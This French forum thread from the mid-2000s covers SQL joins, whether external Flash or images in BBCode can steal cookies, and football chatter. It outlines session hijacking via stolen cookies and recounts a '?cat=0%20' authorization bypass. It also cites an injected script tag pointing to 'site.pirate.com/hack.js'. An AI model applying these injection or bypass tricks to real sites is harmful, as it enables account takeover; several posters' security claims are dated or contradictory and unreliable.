Reprise du message précédent :
Là il ne s'agit pas d'optimisation, mais de concevoir correctement ses requetes afin de moins faire travailler le moteur de données. Ce sont des modifications simples qui ne coute rien en temps, mais qui peut en faire economiser beaucoup au serveur

un peu hs, mais l'inclusion d'une annimation flash depuis une source externe, c'est dangereux dans quel limite ???
 
Sa peu piquer le cookie et puis ???

C'est justement pour ça que je m'y mets.
Je sature au niveau feature, je sais plus quoi faire et ici, c'est dur de trouver des idées, vous parlez tous de gagner quelques ms.
 
Bon, maintenant, j'attends une méthode fiable pour virer mes LIMIT sans, si possible, devoir retoucher à ma bdd.

ça ne peut pas piquer le cookies.
 
Ce n'est pas dangereux.
 
 
Petit rappel pour ceux qui flippe parce que Joce s'était fait piraté le forum, à l'époque, votre mot de passe apparaissait en clair dans le code source de la page, autrement il n'aurait pas pu le faire.
Et même si il avait pu le faire (il aurait surement pu), il faut impérativement que le Flash soit sur le serveur, donc il suffit d'empêcher l'upload du flash sur le serveur, il n'y a rien à craindre des Flashs extérieurs, sauf si vous affichez le mot de passe dans le code source (d'ailleurs, faudra que Joce explique à quoi ça lui servait )

S'il suffit juste d'avoir les cookies pour etre identifié, le flash devient dangereux. Meme si le mot de passe n'est plus en clair.

C'est ce que je dis, mais pour que le fichier Flash puisse lire les cookies, il faut qu'il soit hébergé sur le même serveur que le forum, rien à craindre des Flash externes.  
Quelquesoit la puissance de Flash, il n'a pas la possibilité de lire les cookies d'un autre serveur, autrement ça ne changerait rien qu'il soit dans la page à l'affichage ou non.

2 posts contradictoire
 
je pense plutot comme le premier

Non, mes posts ne sont pas contradictoires et je tiens à le démontrer.
 

Les fichiers Flash extérieurs ne peuvent pas lire les cookies puisqu'ils sont extérieurs au forum.
 

A l'époque, Flash ne permettait pas de lire les cookies de mémoire et même si c'était le cas, voir suite...
 

Il aurait surement pu les lire si Flash en était capable puisqu'il avait réussi à uploader son Flash sur le serveur via les smileys persos. Mais si vraiment il avait pu le faire, ce n'était pas dut à un fichier Flash extérieurs.

moi je pense comme le deuxième.

J'insiste sur ce point car l'histoire du forum MD piratés, ça a fait le tour du net et même sur d'autres forums de programmation, tout les devs de forum ont peur d'inclure le Flash dans leur bbcode à cause de cette histoire.
 
Hors, à ce moment là, il faut également interdire les images car un images.gif extérieurs peut très bien être un script PHP.

Yep autant pour moi, on peu allez jusqu'a récupérer le code source de la page, mais pas du cookie ^^

 
je me rappelle d'une discussion sur les timestamp où tu étais plutôt du genre à gratter quelques octets et faire des optimisations sur du typage d'après le source de php/mysql (à grands coup d'arguments perl / unix)
 
'fin bref, ça m'épate juste que tu découvre les jointures si tu code depuis si longtemps

 
Théorie de The Shadow ® 2006 :

 
J'ai demandé à quelqu'un qui m'a répondu calmement sans se foutre de ma gueule et sans me traiter d'idiot et je me mets au TimestampMySQL désormais.  

Ses posts ne sont pas contradictoires

si la france elle gagne pas contre le bresil, j'arrete de coder mon forum

je parlais des posts de cinocks et de The-Shadow...

Ce qui me donne 2 raisons de prier pour que l'EDF se prenne une rouste mémorable

Oten pour moa, j'avais aussi cru que tu parlais de mes 2 messages.  

Trop facile
Arrête ton forum de suite

au fait, la belgique, elle a une equipe de foot ?    
 

elle a battu la france lors du dernier france belgique

heureusement que tu me donne le nom des pays    

Je propose qu'on poste le mot foot dans tout les topics (kadreg?) puis qu'on arrète d'en parler de partout dans la cat prog, ca devient lourd

+1
Le foot, ras le bol, en plus, chaque soir de match, y'a plus personne sur les forums.

ok

c'est bientot la fin de la coupe du monde
vivement la reprise du championnat

dans le topic foot ya du monde

il est trop naze le topic foot de hfr, ils y connaissent rien et c'est bourré d'oportunistes qui chient sur l'équipe de france pendant les poules et qui maintenant s'approprie leur victoire c'est à gerber
 
Par contre contre le bunker de gilou est bien

 
c'est certainement pas moi qui me suis foutu de ta gueule (en tout cas pas avant qu'on me prenne de haut avec des arguments douteux )
 
enfin bref /hs

Le foot, c'est nul...
 
... comme l'assembleur quoi...

Vivement la vraie coupe du monde, celle de l'année prochaine, en plus elle est en france

Pourquoi irait-il lire les cookies d'un autre serveur.  
Le flash est executé en local sur ta machine.
Il recuperer le cookie correspond au site visé.
Il le depose sur une machine distante.
La machine distante remplace son cookie par celui recuperé par le flash.
La machine distante vient d'usurper l'identité.
 
 
Maintenant est-ce que du flash est capable de lire un cookie?

Une piqûre de rappel semble nécessaire
 
http://forum.hardware.fr/hardwaref [...] 3813-1.htm

Oui

oui mais je ne pense pas que le flash soit capable de lire un cookie qui n'est pas associé au domaine sur lequel le fichier est hebergé, sinon ca serait une faille de sécu critique.

tient au fait, ca me rapelle ya bien longtemps, j'avais trouvé une faille sur mon forum, je pouvais acceder a la cat 0 en lecture et ecriture, j'avais meme pas besoin de me connecter pour la lire.
 
dans l'url fallait remplacer ?cat=0 par ?cat=0%20
 
(%20 signifie espace dans une url)
 
donc en entier c'etait zero, mais pas en chaine de caractere et ca foutait le bordel pour les teste du numero de la cat.
 
   
 

en tout cas, ca marche avec le js. Si sur un page de hfr, j'arrive a marquer <script scr="site.pirate.com/hack.js">, ca passe.
 

 
hereusement, sinon le vol de données de fou des que tu passe sur un site de merde (tu sait les trucs avec des erreurs système qui clignotent partout ou la proposition d'installer gratos tel ou tel prog pour éliminer les menaces de sécu (:lol))
 
bah si un de ces sites arrive a ca, tu récupère tout les cookies et tu peux faire pas mal de choses (et pour peu qu'il reste les cookies de ca banque en ligne )